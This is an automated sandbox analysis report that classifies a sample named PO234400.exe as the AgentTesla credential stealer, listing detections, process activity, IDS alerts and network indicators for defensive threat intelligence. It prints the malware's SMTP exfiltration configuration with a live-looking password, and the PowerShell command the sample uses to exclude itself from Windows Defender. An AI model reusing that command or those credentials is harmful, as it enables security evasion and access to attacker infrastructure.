Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO234400.exe

Overview

General Information

Sample name:PO234400.exe
Analysis ID:1410984
MD5:1ed78424905206c4549ac51b97b5120b
SHA1:bd106b43a6cad1fc21d8b71cb70c86295a9439b7
SHA256:5ca87353c4d37e66f76875a46235208796dd620ad3cb7cebc6b5e66be55b2913
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • PO234400.exe (PID: 7276 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
    • powershell.exe (PID: 7460 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7724 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO234400.exe (PID: 7484 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
    • PO234400.exe (PID: 7516 cmdline: C:\Users\user\Desktop\PO234400.exe MD5: 1ED78424905206C4549AC51B97B5120B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.PO234400.exe.418b348.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.PO234400.exe.4162328.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  6.2.PO234400.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.PO234400.exe.418b348.6.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.PO234400.exe.4162328.5.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PO234400.exe, ParentImage: C:\Users\user\Desktop\PO234400.exe, ParentProcessId: 7276, ParentProcessName: PO234400.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, ProcessId: 7460, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PO234400.exe, ParentImage: C:\Users\user\Desktop\PO234400.exe, ParentProcessId: 7276, ParentProcessName: PO234400.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, ProcessId: 7460, ProcessName: powershell.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO234400.exe, Initiated: true, ProcessId: 7516, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49708
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\PO234400.exe, ParentImage: C:\Users\user\Desktop\PO234400.exe, ParentProcessId: 7276, ParentProcessName: PO234400.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe, ProcessId: 7460, ProcessName: powershell.exe

                        Snort Signatures

                        Timestamp:03/18/24-14:30:28.601602
                        SID:2840032
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/18/24-14:30:28.601602
                        SID:2855542
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/18/24-14:30:28.601602
                        SID:2855245
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/18/24-14:30:28.601602
                        SID:2851779
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/18/24-14:30:28.601602
                        SID:2030171
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/18/24-14:30:28.601602
                        SID:2839723
                        Source Port:49708
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://mail.mbarieservicesltd.comAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: powershell.exe.7460.3.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Multi AV Scanner detection for submitted file
                        Source: PO234400.exeReversingLabs: Detection: 60%
                        Machine Learning detection for sample
                        Source: PO234400.exeJoe Sandbox ML: detected
                        Source: PO234400.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PO234400.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: YgrO.pdb source: PO234400.exe
                        Source: Binary string: YgrO.pdbSHA256_ source: PO234400.exe

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownDNS traffic detected: queries for: mail.mbarieservicesltd.com
                        Source: PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbarieservicesltd.com
                        Source: PO234400.exe, 00000000.00000002.1378595010.0000000002F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: PO234400.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_012CD3640_2_012CD364
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B1BAF00_2_07B1BAF0
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B156880_2_07B15688
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B156530_2_07B15653
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B171E80_2_07B171E8
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B15EF80_2_07B15EF8
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B15AC00_2_07B15AC0
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B18A300_2_07B18A30
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_07B129510_2_07B12951
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_016041406_2_01604140
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_01604D586_2_01604D58
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_0160F7B06_2_0160F7B0
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_016044886_2_01604488
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_0691E7906_2_0691E790
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_069145F06_2_069145F0
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_06917D006_2_06917D00
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_0691CC106_2_0691CC10
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_06919DC06_2_06919DC0
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_0691432C6_2_0691432C
                        Source: PO234400.exe, 00000000.00000000.1360411575.0000000000AFE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYgrO.exe: vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1387729571.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1378595010.0000000002F71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1376728133.000000000102E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1387278956.0000000007262000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
                        Source: PO234400.exe, 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO234400.exe
                        Source: PO234400.exe, 00000006.00000002.2606062779.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO234400.exe
                        Source: PO234400.exe, 00000006.00000002.2606321660.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO234400.exe
                        Source: PO234400.exeBinary or memory string: OriginalFilenameYgrO.exe: vs PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: PO234400.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: PO234400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.418b348.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, dG0cRqRa8r2T3nra0D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.PO234400.exe.2f4f174.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
